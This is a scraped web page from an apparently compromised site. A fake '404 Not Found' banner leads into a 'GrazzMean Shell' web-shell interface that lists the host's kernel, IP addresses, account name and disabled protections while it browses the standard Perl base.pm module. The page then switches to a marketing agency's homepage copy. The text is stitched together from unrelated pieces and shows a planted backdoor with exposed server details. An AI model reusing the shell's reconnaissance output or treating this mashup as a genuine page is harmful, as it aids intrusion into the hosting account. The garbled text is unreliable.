404 Not Found


nginx
beegazpacho.com - GrazzMean
shell bypass 403

GrazzMean Shell

: /usr/share/perl5/ [ drwxr-xr-x ]
Uname: Linux in-mum-web1557.main-hosting.eu 5.14.0-503.35.1.el9_5.x86_64 #1 SMP PREEMPT_DYNAMIC Fri Apr 4 05:23:43 EDT 2025 x86_64
Software: LiteSpeed
PHP version: 8.2.30 [ PHP INFO ] PHP os: Linux
Server Ip: 93.127.173.107
Your Ip: 216.73.216.168
User: u848900432 (848900432) | Group: o51372345 (1051372345)
Safe Mode: OFF
Disable Function:
NONE

name : base.pm
use 5.008;
package base;

use strict 'vars';
our $VERSION = '2.27';
$VERSION =~ tr/_//d;

# simplest way to avoid indexing of the package: no package statement
sub base::__inc::unhook { @INC = grep !(ref eq 'CODE' && $_ == $_[0]), @INC }
# instance is blessed array of coderefs to be removed from @INC at scope exit
sub base::__inc::scope_guard::DESTROY { base::__inc::unhook $_ for @{$_[0]} }

# constant.pm is slow
sub SUCCESS () { 1 }

sub PUBLIC     () { 2**0  }
sub PRIVATE    () { 2**1  }
sub INHERITED  () { 2**2  }
sub PROTECTED  () { 2**3  }


my $Fattr = \%fields::attr;

sub has_fields {
    my($base) = shift;
    my $fglob = ${"$base\::"}{FIELDS};
    return( ($fglob && 'GLOB' eq ref($fglob) && *$fglob{HASH}) ? 1 : 0 );
}

sub has_attr {
    my($proto) = shift;
    my($class) = ref $proto || $proto;
    return exists $Fattr->{$class};
}

sub get_attr {
    $Fattr->{$_[0]} = [1] unless $Fattr->{$_[0]};
    return $Fattr->{$_[0]};
}

if ($] < 5.009) {
    *get_fields = sub {
        # Shut up a possible typo warning.
        () = \%{$_[0].'::FIELDS'};
        my $f = \%{$_[0].'::FIELDS'};

        # should be centralized in fields? perhaps
        # fields::mk_FIELDS_be_OK. Peh. As long as %{ $package . '::FIELDS' }
        # is used here anyway, it doesn't matter.
        bless $f, 'pseudohash' if (ref($f) ne 'pseudohash');

        return $f;
    }
}
else {
    *get_fields = sub {
        # Shut up a possible typo warning.
        () = \%{$_[0].'::FIELDS'};
        return \%{$_[0].'::FIELDS'};
    }
}

if ($] < 5.008) {
    *_module_to_filename = sub {
        (my $fn = $_[0]) =~ s!::!/!g;
        $fn .= '.pm';
        return $fn;
    }
}
else {
    *_module_to_filename = sub {
        (my $fn = $_[0]) =~ s!::!/!g;
        $fn .= '.pm';
        utf8::encode($fn);
        return $fn;
    }
}


sub import {
    my $class = shift;

    return SUCCESS unless @_;

    # List of base classes from which we will inherit %FIELDS.
    my $fields_base;

    my $inheritor = caller(0);

    my @bases;
    foreach my $base (@_) {
        if ( $inheritor eq $base ) {
            warn "Class '$inheritor' tried to inherit from itself\n";
        }

        next if grep $_->isa($base), ($inheritor, @bases);

        # Following blocks help isolate $SIG{__DIE__} and @INC changes
        {
            my $sigdie;
            {
                local $SIG{__DIE__};
                my $fn = _module_to_filename($base);
                my $dot_hidden;
                eval {
                    my $guard;
                    if ($INC[-1] eq '.' && %{"$base\::"}) {
                        # So:  the package already exists   => this an optional load
                        # And: there is a dot at the end of @INC  => we want to hide it
                        # However: we only want to hide it during our *own* require()
                        # (i.e. without affecting nested require()s).
                        # So we add a hook to @INC whose job is to hide the dot, but which
                        # first checks checks the callstack depth, because within nested
                        # require()s the callstack is deeper.
                        # Since CORE::GLOBAL::require makes it unknowable in advance what
                        # the exact relevant callstack depth will be, we have to record it
                        # inside a hook. So we put another hook just for that at the front
                        # of @INC, where it's guaranteed to run -- immediately.
                        # The dot-hiding hook does its job by sitting directly in front of
                        # the dot and removing itself from @INC when reached. This causes
                        # the dot to move up one index in @INC, causing the loop inside
                        # pp_require() to skip it.
                        # Loaded coded may disturb this precise arrangement, but that's OK
                        # because the hook is inert by that time. It is only active during
                        # the top-level require(), when @INC is in our control. The only
                        # possible gotcha is if other hooks already in @INC modify @INC in
                        # some way during that initial require().
                        # Note that this jiggery hookery works just fine recursively: if
                        # a module loaded via base.pm uses base.pm itself, there will be
                        # one pair of hooks in @INC per base::import call frame, but the
                        # pairs from different nestings do not interfere with each other.
                        my $lvl;
                        unshift @INC,        sub { return if defined $lvl; 1 while defined caller ++$lvl; () };
                        splice  @INC, -1, 0, sub { return if defined caller $lvl; ++$dot_hidden, &base::__inc::unhook; () };
                        $guard = bless [ @INC[0,-2] ], 'base::__inc::scope_guard';
                    }
                    require $fn
                };
                if ($dot_hidden && (my @fn = grep -e && !( -d _ || -b _ ), $fn.'c', $fn)) {
                    require Carp;
                    Carp::croak(<<ERROR);
Base class package "$base" is not empty but "$fn[0]" exists in the current directory.
    To help avoid security issues, base.pm now refuses to load optional modules
    from the current working directory when it is the last entry in \@INC.
    If your software worked on previous versions of Perl, the best solution
    is to use FindBin to detect the path properly and to add that path to
    \@INC.  As a last resort, you can re-enable looking in the current working
    directory by adding "use lib '.'" to your code.
ERROR
                }
                # Only ignore "Can't locate" errors from our eval require.
                # Other fatal errors (syntax etc) must be reported.
                #
                # changing the check here is fragile - if the check
                # here isn't catching every error you want, you should
                # probably be using parent.pm, which doesn't try to
                # guess whether require is needed or failed,
                # see [perl #118561]
                die if $@ && $@ !~ /^Can't locate \Q$fn\E .*? at .* line [0-9]+(?:, <[^>]*> (?:line|chunk) [0-9]+)?\.\n\z/s
                          || $@ =~ /Compilation failed in require at .* line [0-9]+(?:, <[^>]*> (?:line|chunk) [0-9]+)?\.\n\z/;
                unless (%{"$base\::"}) {
                    require Carp;
                    local $" = " ";
                    Carp::croak(<<ERROR);
Base class package "$base" is empty.
    (Perhaps you need to 'use' the module which defines that package first,
    or make that module available in \@INC (\@INC contains: @INC).
ERROR
                }
                $sigdie = $SIG{__DIE__} || undef;
            }
            # Make sure a global $SIG{__DIE__} makes it out of the localization.
            $SIG{__DIE__} = $sigdie if defined $sigdie;
        }
        push @bases, $base;

        if ( has_fields($base) || has_attr($base) ) {
            # No multiple fields inheritance *suck*
            if ($fields_base) {
                require Carp;
                Carp::croak("Can't multiply inherit fields");
            } else {
                $fields_base = $base;
            }
        }
    }
    # Save this until the end so it's all or nothing if the above loop croaks.
    push @{"$inheritor\::ISA"}, @bases;

    if( defined $fields_base ) {
        inherit_fields($inheritor, $fields_base);
    }
}


sub inherit_fields {
    my($derived, $base) = @_;

    return SUCCESS unless $base;

    my $battr = get_attr($base);
    my $dattr = get_attr($derived);
    my $dfields = get_fields($derived);
    my $bfields = get_fields($base);

    $dattr->[0] = @$battr;

    if( keys %$dfields ) {
        warn <<"END";
$derived is inheriting from $base but already has its own fields!
This will cause problems.  Be sure you use base BEFORE declaring fields.
END

    }

    # Iterate through the base's fields adding all the non-private
    # ones to the derived class.  Hang on to the original attribute
    # (Public, Private, etc...) and add Inherited.
    # This is all too complicated to do efficiently with add_fields().
    while (my($k,$v) = each %$bfields) {
        my $fno;
        if ($fno = $dfields->{$k} and $fno != $v) {
            require Carp;
            Carp::croak ("Inherited fields can't override existing fields");
        }

        if( $battr->[$v] & PRIVATE ) {
            $dattr->[$v] = PRIVATE | INHERITED;
        }
        else {
            $dattr->[$v] = INHERITED | $battr->[$v];
            $dfields->{$k} = $v;
        }
    }

    foreach my $idx (1..$#{$battr}) {
        next if defined $dattr->[$idx];
        $dattr->[$idx] = $battr->[$idx] & INHERITED;
    }
}


1;

__END__

=head1 NAME

base - Establish an ISA relationship with base classes at compile time

=head1 SYNOPSIS

    package Baz;
    use base qw(Foo Bar);

=head1 DESCRIPTION

Unless you are using the C<fields> pragma, consider this module discouraged
in favor of the lighter-weight C<parent>.

Allows you to both load one or more modules, while setting up inheritance from
those modules at the same time.  Roughly similar in effect to

    package Baz;
    BEGIN {
        require Foo;
        require Bar;
        push @ISA, qw(Foo Bar);
    }

When C<base> tries to C<require> a module, it will not die if it cannot find
the module's file, but will die on any other error.  After all this, should
your base class be empty, containing no symbols, C<base> will die. This is
useful for inheriting from classes in the same file as yourself but where
the filename does not match the base module name, like so:

        # in Bar.pm
        package Foo;
        sub exclaim { "I can have such a thing?!" }

        package Bar;
        use base "Foo";

There is no F<Foo.pm>, but because C<Foo> defines a symbol (the C<exclaim>
subroutine), C<base> will not die when the C<require> fails to load F<Foo.pm>.

C<base> will also initialize the fields if one of the base classes has it.
Multiple inheritance of fields is B<NOT> supported, if two or more base classes
each have inheritable fields the 'base' pragma will croak. See L<fields>
for a description of this feature.

The base class' C<import> method is B<not> called.


=head1 DIAGNOSTICS

=over 4

=item Base class package "%s" is empty.

base.pm was unable to require the base package, because it was not
found in your path.

=item Class 'Foo' tried to inherit from itself

Attempting to inherit from yourself generates a warning.

    package Foo;
    use base 'Foo';

=back

=head1 HISTORY

This module was introduced with Perl 5.004_04.

=head1 CAVEATS

Due to the limitations of the implementation, you must use
base I<before> you declare any of your own fields.


=head1 SEE ALSO

L<fields>

=cut
© 2026 GrazzMean
Beegazpacho


Let’s  Start  Your  Online  Journey  with  Beegazpacho 

Welcome to Beegazpacho,
where creativity meets strategy,
and innovation drives success.


Contact
Now


OUR CLIENTS

WhatsApp-Image-2021-12-06.png
Untitled-design-11.png
niaf-logo.png
20220406-163308-scaled.jpg
karchi-logo.png
20220405-171252.png
20220405-171309.png
20220321-161603.png
20220321-161611.png
20220321-161628.png
20220321-161244.png
20220321-161256.png
20220321-161450.png
20220321-161205.png
20220226-170222.png
20220321-161051.png
20211202-170852.png
Untitled-design-9
pidilite-png-logo-colour
logo-black-e1706125740216-qisosldqhzgcaerhdt6n4t3m4s50jr0iik48z0h5vk
Fraikin-Dayim-logo-1
hpcl-logo-2-1
services

Transforming Ideas into
Success

.01
Digital Marketing

We drive growth through data-driven strategies and cutting-edge techniques.

Learn More

.02
SEO

Improve your online visibility and rank higher on search engines with our expert SEO services.

Learn More

.03
Website Designing

We design websites that are not only visually stunning but also user-centric, ensuring seamless navigation and enhanced user experience.

Learn More

.04
App Development

Our apps are crafted to be intuitive, engaging, and functional, providing your users with an exceptional mobile experience.

Learn More

.05
Social Media Ads

Target the right audience with precision and creativity to maximize engagement and conversions.

Learn More

.06
Google Ads

Maximize ROI with precision-targeted campaigns on Google’s powerful ad platform.

Learn More

.07
Google My Business

Optimize your local presence with strategies that put your business on the map and attract more customers.

Learn More

.08
Graphic Designing

Our designs tell your brand’s story in a visually compelling way.

Learn More

.09
3D Videos

Bring your product to life with immersive and dynamic 3D explainer videos.

Learn More

about BEEGAZPACHO

creating special Things
For special brands

Join the ranks of successful brands by partnering with Beegazpacho

00+

Happy Customer

00+

Continents

Our vision is not just to be a service provider but to be your partner in growth. We see ourselves as an extension of your team, working tirelessly to ensure that your brand not only meets its goals but surpasses them.

Explore
more

Our Recent Work

Crafted with Passion and Precision

Connect now


Web Design
Design, Development & Identity

Logo Design
Design, Development & Identity

Creative Brand design
Design, Development & Identity

Product Design Marketing
Design, Development & Identity

DIGITAL MARKETING
SEO
WEBSITE DESIGNING
APP DEVELOPMENT
SOCIAL MEDIA ADS
GOOGLE ADS
GOOGLE MY BUSINESS
GRAPHIC DESINING
3D VIDEOS
Client Stories

Hear It from Those Who Know Us Best

Our clients’ success stories speak volumes about our commitment to excellence. Don’t just take our word for it—hear directly from the brands we’ve partnered with. Their testimonials highlight our ability to bring visions to life and create a lasting impact on their businesses.

“Beegazpacho feels like an extension of our team. Their content marketing and social media expertise have elevated our brand. They listen, adapt, and always deliver on time. We look forward to continuing this partnership.”

— Sarah Williams

Head of Marketing, GreenPlanet Apparel

“Beegazpacho’s data-driven strategies helped us improve our online ads, optimize our website, and enhance branding. We’ve seen great ROI and increased visibility. Their professionalism is unmatched.”

— Arvind Shah

CEO, InnovateTech Solutions

“Partnering with Beegazpacho has been a game-changer for our brand. Their creative ad campaigns and SEO services have boosted our online presence and significantly increased leads and sales. We couldn’t ask for a better partner!”

— Rina Kapoor

Marketing Director, Luxury Home Interiors

“Beegazpacho feels like an extension of our team. Their content marketing and social media expertise have elevated our brand. They listen, adapt, and always deliver on time. We look forward to continuing this partnership.”

— Sarah Williams

Head of Marketing, GreenPlanet Apparel

“Beegazpacho’s data-driven strategies helped us improve our online ads, optimize our website, and enhance branding. We’ve seen great ROI and increased visibility. Their professionalism is unmatched.”

— Arvind Shah

CEO, InnovateTech Solutions

“Partnering with Beegazpacho has been a game-changer for our brand. Their creative ad campaigns and SEO services have boosted our online presence and significantly increased leads and sales. We couldn’t ask for a better partner!”

— Rina Kapoor

Marketing Director, Luxury Home Interiors